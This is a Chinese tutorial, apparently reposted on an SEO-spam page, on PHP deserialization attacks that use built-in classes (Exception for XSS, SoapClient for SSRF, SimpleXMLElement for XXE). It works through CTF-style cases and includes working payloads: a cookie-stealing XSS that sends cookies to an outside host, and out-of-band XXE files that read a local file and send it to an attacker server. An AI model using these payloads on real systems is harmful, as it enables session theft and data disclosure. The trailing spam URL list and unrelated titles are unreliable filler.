当前位置: 首页 > wzjs >正文

怎么注册网站平台做网站百度收费吗

怎么注册网站平台,做网站百度收费吗,怎么建立公司网站,自助建站网知识点: 1、WEB攻防-PHP反序列化-原生类&生成及利用条件 2、WEB攻防-PHP反序列化-Exception触发XSS 3、WEB攻防-PHP反序列化-SoapClient触发SSRF 4、WEB攻防-PHP反序列化-SimpleXMLElement触发XXE原生类的出现就是为了解决这个问题,当遇到无类可用或…

知识点:
1、WEB攻防-PHP反序列化-原生类&生成及利用条件
2、WEB攻防-PHP反序列化-Exception触发XSS
3、WEB攻防-PHP反序列化-SoapClient触发SSRF
4、WEB攻防-PHP反序列化-SimpleXMLElement触发XXE

在这里插入图片描述
原生类的出现就是为了解决这个问题,当遇到无类可用或者有类无危险方法的时候就可以尝试使用原生类来进行反序列化攻击。

原生自带类参考
https://xz.aliyun.com/news/8792
https://www.anquanke.com/post/id/264823
https://blog.csdn.net/cjdgg/article/details/115314651利用条件:
1、有触发魔术方法
2、魔术方法有利用类
3、部分自带类配置拓展开启(例如SoapClient类要在php.ini里开启soap)获取php自带原生类:
<?php
$classes = get_declared_classes();
foreach ($classes as $class) {$methods = get_class_methods($class);foreach ($methods as $method) {if (in_array($method, array(
'__construct','__destruct','__toString','__wakeup','__call','__callStatic','__get','__set','__isset','__unset','__invoke','__set_state'))) {print $class . '::' . $method . "\n";}}
}

在这里插入图片描述

一、演示案例-WEB攻防-PHP反序列化-原生类&Exception&XSS

使用原生Error/Exception类(处理异常错误信息并输出)进行XSS

DEMO

<?php
$a = unserialize($_GET['code']);
echo $a;
?>

在这里插入图片描述

POC链:
<?php
$a=new Exception("<script>alert('xiaodi')</script>");
echo urlencode(serialize($a));
?>

在这里插入图片描述
在这里插入图片描述

输出对象可调用__toString
无代码通过原生类Exception
Exception使用查询编写利用
通过访问触发输出产生XSS漏洞

在这里插入图片描述

[BJDCTF 2nd]xss之光

在这里插入图片描述

poc链:
<?php
$poc = new Exception("<script>window.open('http://462795d3-ea59-4f00-9657-d50f15178248.node5.buuoj.cn:81/?'+document.cookie);</script>");
echo urlencode(serialize($poc));
?>

在这里插入图片描述
在这里插入图片描述

二、演示案例-WEB攻防-PHP反序列化-原生类&SoapClient&SSRF

使用SoapClient类进行SSRF

DEMO

ssrf.php
<?php
$s = unserialize($_GET['ssrf']);
$s->a(); //调用a方法,a不存在触发__call方法
?>
-输出对象可调用__call方法
-无代码通过原生类SoapClient
-SoapClient使用查询编写利用
-通过访问触发服务器SSRF漏洞POP链:
<?php
$a = new SoapClient(null,array('location'=>'http://192.168.1.4:2222/aaa', 'uri'=>'http://192.168.1.4:2222'));
$b = serialize($a);
echo $b;
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

CTFSHOW-259

在这里插入图片描述
在这里插入图片描述

-不存在的方法触发__call
-无代码通过原生类SoapClient
-SoapClient使用查询编写利用
-通过访问本地Flag.php获取Flagpop链:
<?php
$ua="aaa\r\nX-Forwarded-For:127.0.0.1,127.0.0.1\r\nContent-Type:application/x-www-form-urlencoded\r\nContent-Length:13\r\n\r\ntoken=ctfshow";
$client=new SoapClient(null,array('uri'=>'http://127.0.0.1/','location'=>'http://127.0.0.1/flag.php','user_agent'=>$ua));
echo urlencode(serialize($client));
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三、演示案例-WEB攻防-PHP反序列化-原生类&SimpleXMLElement&XXE

使用SimpleXMLElement类进行xxe

DEMO

攻击者服务器上放3个文件
1、oob.xml
在这里插入图片描述
2、send.xml
在这里插入图片描述
3、send.php
在这里插入图片描述

pop链:
<?php
$sxe=new SimpleXMLElement('http://外网IP地址/oob.xml',2,true); 
$a = serialize($sxe);
echo $a;
?>

在这里插入图片描述

-new触发__construct
-无代码通过原生类SimpleXMLElement
-SimpleXMLElement使用查询编写利用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

[SUCTF 2018]Homework

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用点:SimpleXMLElement(url,2,true)
Poc:
/show.php?module=SimpleXMLElement&args[]=http://120.27.152.29/oob.xml&args[]=2&args[]=true

在这里插入图片描述

外网服务器:
oob.xml:
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % remote SYSTEM "http://ip/send.xml">
%remote;
%all;
%send;
]>send.xml:
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=x.php">
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://ip/send.php?file=%file;'>">send.php:
<?php
file_put_contents("result.txt", $_GET['file']) ;
?>

文章转载自:

http://83XU3fTh.ftmLy.cn
http://6o54nUh9.ftmLy.cn
http://BD5w2L4Q.ftmLy.cn
http://csXjcjYn.ftmLy.cn
http://ssjkVcLu.ftmLy.cn
http://Zv7uFuHb.ftmLy.cn
http://e7HjWuD9.ftmLy.cn
http://rCtl6Uc8.ftmLy.cn
http://uQi2jHyo.ftmLy.cn
http://evw5BS5K.ftmLy.cn
http://01CKw5Fk.ftmLy.cn
http://GliQ417c.ftmLy.cn
http://AXmDR0hj.ftmLy.cn
http://FsIOcq58.ftmLy.cn
http://QL8tXA8Q.ftmLy.cn
http://U3UYakPT.ftmLy.cn
http://tBoO7UGE.ftmLy.cn
http://hcDnVDOq.ftmLy.cn
http://7k8JWya9.ftmLy.cn
http://zRKiFYoq.ftmLy.cn
http://mOgfOpfs.ftmLy.cn
http://cB4kGr0i.ftmLy.cn
http://CK4MQrBK.ftmLy.cn
http://tJzCcnX5.ftmLy.cn
http://JZCOwD3v.ftmLy.cn
http://BPoWT38Z.ftmLy.cn
http://Om1IgCUp.ftmLy.cn
http://8M4Ed0kP.ftmLy.cn
http://2Lai8008.ftmLy.cn
http://QPU4KxJX.ftmLy.cn
http://www.dtcms.com/wzjs/775930.html

相关文章:

  • 手机网站 源码小程序开发工具
  • 百度网站模板免费下载阜城网站建设代理
  • 做视频网站都需要什么软件网站开发 -(广告)
  • 学校网站怎么做推广方案网站排名优化原理
  • 做淘客网站需要多大空间phpcms网站模版
  • 宁波网站推广软件哪家强些近期新闻消息
  • 网站的建设可以起到什么作用诸城网站建设诸城
  • wordpress建站博客园企业品牌网站建设注意事项
  • 广东源江建设集团有限公司网站app浏览器下载
  • 做内销网站湖南天人安装建设有限公司网站
  • 网站建设名字怎么在各大网站做推广
  • 企业网站首页开发培训网页设计吗
  • 企业的做网站广州网站建设信科便宜
  • 濮阳网站建设熊掌号跨境电商seo
  • 网站静态文件学校网站建设目的是什么
  • 网站被盗用济南 营销型网站建设
  • 上海正规做网站公司电话个人网页设计与制作教程
  • 做网站买域名要买几个后缀最安全旅游网站平台建设的方案
  • 做网站需要些什么滑动门代码 wordpress
  • 网站建设代码合同可以做思维导图的网站
  • 电子商务毕业设计设计电商网站建设工作室建设
  • 一个学校怎么制作网站找别人做网站可以提供源码吗
  • 创建网站的工作流程企业信息查询软件
  • 网站建设 阿里手工活接单正规平台
  • 南阳网站排名优化公司wordpress演示地址转换短网址
  • 中国十大网站建设比格设计网站官网
  • 关于优化网站建设的方案推广产品的方法
  • 青岛做外贸网站的公司简介广告设计与制作包括哪些
  • 郑州网站设计wordpress不用邮件确认
  • 网站建设如何设置登录页面如何制作公司网站方案